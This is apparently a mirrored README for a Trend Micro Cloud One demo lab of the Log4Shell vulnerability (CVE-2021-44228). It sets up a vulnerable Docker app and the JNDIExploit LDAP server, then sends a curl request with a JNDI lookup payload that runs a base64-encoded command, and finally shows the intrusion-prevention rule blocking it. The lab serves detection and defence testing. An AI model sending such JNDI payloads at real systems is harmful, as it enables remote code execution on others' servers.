CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

Associated Vulnerability

Description

Quick Deploy to show case cve-2021-44228

Readme

# Cloud One - Workload Security Log4Shell
This repo contains a quick deployment template to showcase CVE-2021-44228 LOG4SHELL exploit and Workload Security Intrusion Prevention

### Note on CFT deployment in AWS regions
- I only added AMI Id's for US-EAST-1, US-EAST-2, US-WEST-1, US-WEST-2, CA-CENTRAL-1, SA-EAST-1, EU-WEST-1.

## Deploy CloudFormation Template

Parameters to Define:
- **KeyPair**: Name of a current Key Pair
- **IPforSSH**: restrict SSH access to your IP. Default is 0.0.0.0/0

[![Launch Stack](https://cdn.rawgit.com/buildkite/cloudformation-launch-stack-button-svg/master/launch-stack.svg)](https://console.aws.amazon.com/cloudformation/home#/stacks/new?stackName=c1-ws-log4shell&templateURL=https://aws-workshop-c1as-cft-templates.s3.amazonaws.com/c1-ws-log4shell.yaml)

![architecture](images/architecture.png)

---

## After CloudFormation Template Deployment

## 1. SSH into EC2 instance(Shell A)
    ```bash
    sudo su
    <Deploy Workload Security Agent deployment script with Linux Policy attached.>
    ```
![deployment_script](images/deploymentscript.png)

## 2. In Cloud One-WS: Assign IPS rule for CVE-2021-44228 to linux machine
    - IPS rule number: **1011242** or **1008610**
    - Assign rule and change to **Detect Only** for now.
    - Accept all rule dependencies.

![Click here for additional coverage on Apache Log4j "Log4Shell" Remote Code Execution 0-Day Vulnerability (CVE-2021-44228)](https://success.trendmicro.com/solution/000289940)
    
![ips_rule](images/ipsrule.png)
    
![detect_only](images/detectonly.png)

---

## 3. Start docker app(Shell A)

```bash
cd log4shell-vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```
![docker_run](images/dockerstart.png)

---

## 4. Open Second SSH session(Shell B) and run command to create LDAP server
* [JNDIExploit](https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) provided by feihong-cs before it was removed from GitHub.
```bash
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
```

## 5. Run Exploit
- Open new SSH session(Shell C)

```bash
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
```
Notice the output(Shell B) of JNDIExploit, showing it has sent the malicious LDAP response and served the second-stage payload:

![shell-b](images/shell-b.png)

---

## 6. Confirm RCE was successful with the creation of pwned.txt file inside the running container's /tmp directory. 
- Using Shell C

```bash
docker exec vulnerable-app ls /tmp
```
![shell-c](images/shell-c.png)

---

## Repeat attack this time with IPS rule set to **Prevent**


## Reference
- Thank you [christophetd](https://github.com/christophetd/log4shell-vulnerable-app) for providing the vulnerable Spring Boot web application.
- Trend Micro Success: https://success.trendmicro.com/solution/000289940
- This web-based tool can help identify server applications that may be affected by the Log4Shell: https://log4j-tester.trendmicro.com/

File Snapshot

 [4.0K]  /data/pocs/dd966fbbc56e6ed999703b1e49c1d3241922e225
├── [4.9K]  cloudformation.yaml
├── [4.0K]  images
│   ├── [ 17K]  architecture.png
│   ├── [ 62K]  deploymentscript.png
│   ├── [ 46K]  detectonly.png
│   ├── [ 16K]  dockerstart.png
│   ├── [ 29K]  ipsrule.png
│   ├── [ 22K]  shell-b.png
│   └── [ 19K]  shell-c.png
└── [3.0K]  README.md

1 directory, 9 files

Remarks